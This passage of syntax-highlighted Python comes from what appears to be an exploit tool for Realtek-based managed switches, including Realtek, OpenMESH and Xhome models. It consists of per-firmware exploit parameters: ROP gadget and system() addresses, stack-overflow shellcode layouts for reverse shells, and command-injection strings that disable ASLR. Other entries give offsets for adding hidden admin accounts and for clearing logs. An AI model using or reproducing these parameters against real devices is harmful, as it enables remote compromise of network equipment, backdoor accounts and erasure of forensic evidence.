					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()</span>
						<span class="token string">'sys_timeSntp_set'</span><span class="token punctuation">:</span><span class="token number">0x43BA8C</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Set SNTP Server (Inject CMD)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()</span>
						<span class="token string">'sys_timeSntpDel_set'</span><span class="token punctuation">:</span><span class="token number">0x43BA8C</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Delete (address, binary dependent) </span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()</span>
						<span class="token string">'sys_timeSettings_set'</span><span class="token punctuation">:</span><span class="token number">0x43AF54</span><span class="token punctuation">,</span><span class="token comment"># Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'cgi'</span><span class="token punctuation">:</span><span class="token string">'dispatcher.cgi'</span><span class="token punctuation">,</span>			<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; main()</span>
						<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">100</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_RA_START&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">59</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'&amp;STARTUP_BACKUP=1'</span><span class="token operator">+</span> <span class="token punctuation">(</span><span class="token punctuation">(</span><span class="token string">'&amp;'</span> <span class="token operator">+</span> struct<span class="token punctuation">.</span>pack<span class="token punctuation">(</span><span class="token string">'&gt;L'</span><span class="token punctuation">,</span><span class="token number">0x2404FF3D</span><span class="token punctuation">)</span> <span class="token operator">+</span> struct<span class="token punctuation">.</span>pack<span class="token punctuation">(</span><span class="token string">'&gt;L'</span><span class="token punctuation">,</span><span class="token number">0x2404FFFF</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token operator">*</span> <span class="token number">70</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">'&amp;'</span> <span class="token operator">+</span> struct<span class="token punctuation">.</span>pack<span class="token punctuation">(</span><span class="token string">'&gt;L'</span><span class="token punctuation">,</span><span class="token number">0x2404FF3D</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_SHELLCODE'</span><span class="token punctuation">,</span>
						<span class="token string">'START'</span><span class="token punctuation">:</span><span class="token number">0x10010104</span><span class="token punctuation">,</span>				<span class="token comment"># start: Stack overflow RA, used for searching NOP sled by blind jump</span>
						<span class="token string">'STOP'</span><span class="token punctuation">:</span> <span class="token number">0x104006A0</span><span class="token punctuation">,</span>				<span class="token comment"># end: You may want to play with this if you dont get it working</span>
						<span class="token string">'usr_nop'</span><span class="token punctuation">:</span> <span class="token number">25</span><span class="token punctuation">,</span>					<span class="token comment"># NOP sled (shellcode will be tailed)</span>
						<span class="token string">'pwd_nop'</span><span class="token punctuation">:</span> <span class="token number">15</span><span class="token punctuation">,</span>					<span class="token comment"># filler/garbage (not used for something constructive)</span>
						<span class="token string">'align'</span><span class="token punctuation">:</span> <span class="token number">0</span><span class="token punctuation">,</span>						<span class="token comment"># Align opcodes in memory</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>					<span class="token comment"># NOP and shellcode lays on: True = stack, False = Heap</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token comment">#</span>
			<span class="token comment"># Realtek</span>
			<span class="token comment">#</span>
			<span class="token comment"># CGI Reverse Shell      : Yes</span>
			<span class="token comment"># Boa/Hydra reverse shell: Yes</span>
			<span class="token comment"># Del /var/log/ram.log   : Yes</span>
			<span class="token comment"># Del /var/log/flash.log : No</span>
			<span class="token comment"># Del /mntlog/flash.log  : No</span>
			<span class="token comment"># Add credentials        : Yes</span>
			<span class="token comment"># Del credentials        : Yes</span>
			<span class="token comment">#</span>
			<span class="token string">'222-40570'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
				<span class="token string">'template'</span><span class="token punctuation">:</span><span class="token string">'Realtek'</span><span class="token punctuation">,</span>					<span class="token comment"># Static for the vendor</span>
				<span class="token string">'version'</span><span class="token punctuation">:</span><span class="token string">'3.0.0.43126'</span><span class="token punctuation">,</span>				<span class="token comment"># Version / binary dependent stuff</span>
				<span class="token string">'model'</span><span class="token punctuation">:</span><span class="token string">'RTL8380-24GE-4GEC'</span><span class="token punctuation">,</span>			<span class="token comment"># Model</span>
				<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'https://www.realtek.com/en/products/communications-network-ics/item/rtl8381m-vb-cg-2'</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/bin/boa; embedparse() </span>
						<span class="token string">'gadget'</span><span class="token punctuation">:</span> <span class="token number">0x40E6DC</span><span class="token punctuation">,</span>				<span class="token comment"># Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'system'</span><span class="token punctuation">:</span> <span class="token number">0x8f99851c</span><span class="token punctuation">,</span>			<span class="token comment"># la $t9, system) # opcode, binary dependent</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'handler'</span><span class="token punctuation">:</span> <span class="token number">0x24841ea8</span><span class="token punctuation">,</span>			<span class="token comment"># addiu $a0, (.ascii "handler -c boa &amp;" - 0x430000) # (opcode, binary dependent)</span>
						<span class="token string">'v0'</span><span class="token punctuation">:</span> <span class="token number">7</span><span class="token punctuation">,</span>						<span class="token comment"># Should leave as-is (but you can play between 5 - 8)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_add_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_del_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment">#</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token comment"># Ping IPv4</span>
						<span class="token string">'sys_ping_post_cmd'</span><span class="token punctuation">:</span><span class="token string">'ip=127.0.0.1 ;echo 0 &gt; /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space&amp;count=1'</span><span class="token punctuation">,</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/pingtest_tmp'</span><span class="token punctuation">,</span>
						<span class="token string">'web_sys_ping_post'</span><span class="token punctuation">:</span><span class="token number">0x422980</span><span class="token punctuation">,</span>	<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_sys_ping_post()</span>

						<span class="token comment"># traceroute</span>
						<span class="token comment">#'web_sys_ping_post':0x423168,	# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_sys_trace_route_post()</span>
						<span class="token comment">#'sys_ping_post_cmd':'ip=127.0.0.1 ;echo 0 &gt; /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space &gt; /tmp/traceroute_tmp #&amp;tr_maxhop=30&amp;count=1',</span>
						<span class="token comment">#'verify_uri':'/tmp/traceroute_tmp',</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_setting_post()</span>
						<span class="token string">'log_settings_set'</span><span class="token punctuation">:</span><span class="token number">0x481968</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()</span>
						<span class="token string">'log_ramClear'</span><span class="token punctuation">:</span><span class="token number">0x4847DC</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()</span>
						<span class="token string">'log_fileClear'</span><span class="token punctuation">:</span><span class="token number">0x4847DC</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'sys_timeSntp_set'</span><span class="token punctuation">:</span><span class="token number">0x42C8F0</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Set SNTP Server (Inject CMD)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()</span>
						<span class="token string">'sys_timeSntpDel_set'</span><span class="token punctuation">:</span><span class="token number">0x42C8F0</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Delete (address, binary dependent) </span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()</span>
						<span class="token string">'sys_timeSettings_set'</span><span class="token punctuation">:</span><span class="token number">0x42C8F0</span><span class="token punctuation">,</span><span class="token comment"># Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'cgi'</span><span class="token punctuation">:</span><span class="token string">'dispatcher.cgi'</span><span class="token punctuation">,</span>			<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; main()</span>
						<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'username=_USRNOP&amp;password=_PWDNOP_RA_START&amp;login=1&amp;_USRNOP_USRNOP_SHELLCODE'</span><span class="token punctuation">,</span>
						<span class="token string">'START'</span><span class="token punctuation">:</span><span class="token number">0x7fff7004</span><span class="token punctuation">,</span>				<span class="token comment"># start: Stack overflow RA, used for searching NOP sled by blind jump</span>
						<span class="token string">'STOP'</span><span class="token punctuation">:</span><span class="token number">0x7fc60000</span><span class="token punctuation">,</span>				<span class="token comment"># end: You may want to play with this if you dont get it working</span>
						<span class="token string">'usr_nop'</span><span class="token punctuation">:</span> <span class="token number">28</span><span class="token punctuation">,</span>					<span class="token comment"># NOP sled (shellcode will be tailed)</span>
						<span class="token string">'pwd_nop'</span><span class="token punctuation">:</span> <span class="token number">20</span><span class="token punctuation">,</span>					<span class="token comment"># filler/garbage (not used for something constructive)</span>
						<span class="token string">'align'</span><span class="token punctuation">:</span> <span class="token number">0</span><span class="token punctuation">,</span>						<span class="token comment"># Align opcodes in memory</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>					<span class="token comment"># NOP and shellcode lays on: True = stack, False = Heap</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token comment">#</span>
			<span class="token comment"># OpenMESH (some identical with enginius egs series)</span>
			<span class="token comment">#</span>
			<span class="token comment"># CGI Reverse Shell      : Yes</span>
			<span class="token comment"># Boa/Hydra reverse shell: Yes</span>
			<span class="token comment"># Del /var/log/ram.log   : Yes</span>
			<span class="token comment"># Del /var/log/flash.log : Yes</span>
			<span class="token comment"># Del /mntlog/flash.log  : Yes</span>
			<span class="token comment"># Add credentials        : Yes</span>
			<span class="token comment"># Del credentials        : Yes</span>
			<span class="token comment">#</span>
			<span class="token string">'13984-12788'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
				<span class="token string">'template'</span><span class="token punctuation">:</span><span class="token string">'OpenMESH'</span><span class="token punctuation">,</span>						<span class="token comment"># Static for the vendor</span>
				<span class="token string">'version'</span><span class="token punctuation">:</span><span class="token string">'01.03.24_180823-1626'</span><span class="token punctuation">,</span>					<span class="token comment"># Version / binary dependent stuff</span>
				<span class="token string">'model'</span><span class="token punctuation">:</span><span class="token string">'OMS24'</span><span class="token punctuation">,</span>				<span class="token comment"># Model</span>
				<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'https://www.openmesh.com/'</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/bin/boa; embedparse() </span>
						<span class="token string">'gadget'</span><span class="token punctuation">:</span> <span class="token number">0x40E12C</span><span class="token punctuation">,</span>				<span class="token comment"># Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'system'</span><span class="token punctuation">:</span> <span class="token number">0x8f99851c</span><span class="token punctuation">,</span>			<span class="token comment"># la $t9, system # opcode, binary dependent</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'handler'</span><span class="token punctuation">:</span> <span class="token number">0x248405a0</span><span class="token punctuation">,</span>			<span class="token comment"># addiu $a0, (.ascii "handler -c boa &amp;" - 0x430000) # (opcode, binary dependent)</span>
						<span class="token string">'v0'</span><span class="token punctuation">:</span> <span class="token number">7</span><span class="token punctuation">,</span>						<span class="token comment"># Should leave as-is (but you can play between 5 - 8)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_add_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi;  cgi_sys_acctAdd_set()</span>
						<span class="token string">'address'</span><span class="token punctuation">:</span><span class="token number">0x424890</span><span class="token punctuation">,</span>				<span class="token comment"># Jump one after 'sw $ra'			# (address, binary dependent)</span>
						<span class="token string">'account'</span><span class="token punctuation">:</span><span class="token string">'&amp;na=USERNAME&amp;pw=PASSWORD&amp;pv=0&amp;op=1&amp;'</span><span class="token punctuation">,</span>			<span class="token comment"># Admin, priv 15</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_del_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi;  sn_user_mngSet()</span>
						<span class="token string">'address'</span><span class="token punctuation">:</span><span class="token number">0x424890</span><span class="token punctuation">,</span>				<span class="token comment"># Jump one after 'sw $ra'			# (address, binary dependent)</span>
						<span class="token string">'account'</span><span class="token punctuation">:</span><span class="token string">'&amp;na=USERNAME&amp;pw=&amp;pv=0&amp;op=0'</span><span class="token punctuation">,</span>		<span class="token comment"># </span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># user</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/datajson.cgi;  sn_ipv4PingSet()</span>
						<span class="token comment">#'web_sys_ping_post':0x42341C,	# Jump one after 'sw $ra'			# (address, binary dependent)</span>

														<span class="token comment"># /sqfs/home/web/cgi-bin/datajson.cgi;  sn_tracertSet()</span>
						<span class="token string">'sys_ping_post_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;ip=127.0.0.1 ; echo 0 &gt; /proc/sys/kernel/randomize_va_space #&amp;mh=30&amp;uid=0'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_ping_post_check'</span><span class="token punctuation">:</span><span class="token string">'&amp;ip=127.0.0.1 ; cat /proc/sys/kernel/randomize_va_space &gt; /tmp/conf_tmp/check #&amp;mh=30&amp;uid=0'</span><span class="token punctuation">,</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/conf_tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'web_sys_ping_post'</span><span class="token punctuation">:</span> <span class="token number">0x424248</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># </span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_globalSet()</span>
						<span class="token string">'log_settings_set'</span><span class="token punctuation">:</span><span class="token number">0x43EA88</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()</span>
						<span class="token string">'log_ramClear'</span><span class="token punctuation">:</span><span class="token number">0x440660</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()</span>
						<span class="token string">'log_fileClear'</span><span class="token punctuation">:</span><span class="token number">0x440660</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()</span>
						<span class="token string">'sys_timeSntp_set'</span><span class="token punctuation">:</span><span class="token number">0x425260</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntpDel_set()</span>
						<span class="token string">'sys_timeSntpDel_set'</span><span class="token punctuation">:</span><span class="token number">0x425260</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Delete (address, binary dependent) </span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSettings_set()</span>
						<span class="token string">'sys_timeSettings_set'</span><span class="token punctuation">:</span><span class="token number">0x425260</span><span class="token punctuation">,</span><span class="token comment"># Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'cgi'</span><span class="token punctuation">:</span><span class="token string">'security.cgi'</span><span class="token punctuation">,</span>			<span class="token comment"># /sqfs/home/web/cgi-bin/security.cgi; main()</span>
						<span class="token string">'START'</span><span class="token punctuation">:</span><span class="token number">0x100181A0</span><span class="token punctuation">,</span>				<span class="token comment"># start: Stack overflow RA, used for searching NOP sled by blind jump</span>
						<span class="token string">'STOP'</span><span class="token punctuation">:</span><span class="token number">0x104006A0</span><span class="token punctuation">,</span>				<span class="token comment"># end: You may want to play with this if you dont get it working</span>
						<span class="token string">'usr_nop'</span><span class="token punctuation">:</span> <span class="token number">987</span><span class="token punctuation">,</span>					<span class="token comment"># NOP sled (shellcode will be tailed)</span>
						<span class="token string">'pwd_nop'</span><span class="token punctuation">:</span> <span class="token number">69</span><span class="token punctuation">,</span>					<span class="token comment"># filler/garbage (not used for something constructive)</span>
						<span class="token string">'align'</span><span class="token punctuation">:</span> <span class="token number">0</span><span class="token punctuation">,</span>						<span class="token comment"># Align opcodes in memory</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>					<span class="token comment"># NOP and shellcode lays on: True = stack, False = Heap</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token comment">#</span>
			<span class="token comment"># Xhome (identical with Realtek)</span>
			<span class="token comment">#</span>
			<span class="token comment"># CGI Reverse Shell      : Yes</span>
			<span class="token comment"># Boa/Hydra reverse shell: Yes</span>
			<span class="token comment"># Del /var/log/ram.log   : Yes</span>
			<span class="token comment"># Del /var/log/flash.log : No</span>
			<span class="token comment"># Del /mntlog/flash.log  : No</span>
			<span class="token comment"># Add credentials        : Yes</span>
			<span class="token comment"># Del credentials        : Yes</span>
			<span class="token comment">#</span>
			<span class="token string">'222-64895'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
				<span class="token string">'template'</span><span class="token punctuation">:</span><span class="token string">'Xhome'</span><span class="token punctuation">,</span>					<span class="token comment"># Static for the vendor</span>
				<span class="token string">'version'</span><span class="token punctuation">:</span><span class="token string">'3.0.0.43126'</span><span class="token punctuation">,</span>			<span class="token comment"># Version / binary dependent stuff</span>
				<span class="token string">'model'</span><span class="token punctuation">:</span><span class="token string">'DownLoop-G24M'</span><span class="token punctuation">,</span>			<span class="token comment"># Model</span>
				<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'http://www.xhome.com.tw/product_info.php?info=p116_XHome-DownLoop-G24M----------------------------------------.html'</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/bin/boa; embedparse() </span>
						<span class="token string">'gadget'</span><span class="token punctuation">:</span> <span class="token number">0x40E6DC</span><span class="token punctuation">,</span>				<span class="token comment"># Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'system'</span><span class="token punctuation">:</span> <span class="token number">0x8f99851c</span><span class="token punctuation">,</span>			<span class="token comment"># la $t9, system) # opcode, binary dependent</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'handler'</span><span class="token punctuation">:</span> <span class="token number">0x24841ea8</span><span class="token punctuation">,</span>			<span class="token comment"># addiu $a0, (.ascii "handler -c boa &amp;" - 0x430000) # (opcode, binary dependent)</span>
						<span class="token string">'v0'</span><span class="token punctuation">:</span> <span class="token number">7</span><span class="token punctuation">,</span>						<span class="token comment"># Should leave as-is (but you can play between 5 - 8)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_add_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_del_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment">#</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token comment"># Ping IPv4</span>
						<span class="token string">'sys_ping_post_cmd'</span><span class="token punctuation">:</span><span class="token string">'ip=127.0.0.1 ; echo 0 &gt; /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space&amp;count=1'</span><span class="token punctuation">,</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/pingtest_tmp'</span><span class="token punctuation">,</span>
						<span class="token string">'web_sys_ping_post'</span><span class="token punctuation">:</span><span class="token number">0x4229A0</span><span class="token punctuation">,</span>	<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_sys_ping_post()</span>

						<span class="token comment"># traceroute</span>
						<span class="token comment">#'sys_ping_post_cmd':'ip=127.0.0.1 ; echo 0 &gt; /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space &gt; /tmp/traceroute_tmp #&amp;tr_maxhop=30&amp;count=1',</span>
						<span class="token comment">#'verify_uri':'/tmp/traceroute_tmp',</span>
						<span class="token comment">#'web_sys_ping_post':0x423188,	# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_sys_trace_route_post()</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_setting_post()</span>
						<span class="token string">'log_settings_set'</span><span class="token punctuation">:</span><span class="token number">0x481988</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()</span>
						<span class="token string">'log_ramClear'</span><span class="token punctuation">:</span><span class="token number">0x4847FC</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()</span>
						<span class="token string">'log_fileClear'</span><span class="token punctuation">:</span><span class="token number">0x4847FC</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'sys_timeSntp_set'</span><span class="token punctuation">:</span><span class="token number">0x42C910</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Set SNTP Server (Inject CMD)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()</span>
						<span class="token string">'sys_timeSntpDel_set'</span><span class="token punctuation">:</span><span class="token number">0x42C910</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Delete (address, binary dependent) </span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()</span>
						<span class="token string">'sys_timeSettings_set'</span><span class="token punctuation">:</span><span class="token number">0x42B6F8</span><span class="token punctuation">,</span><span class="token comment"># Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
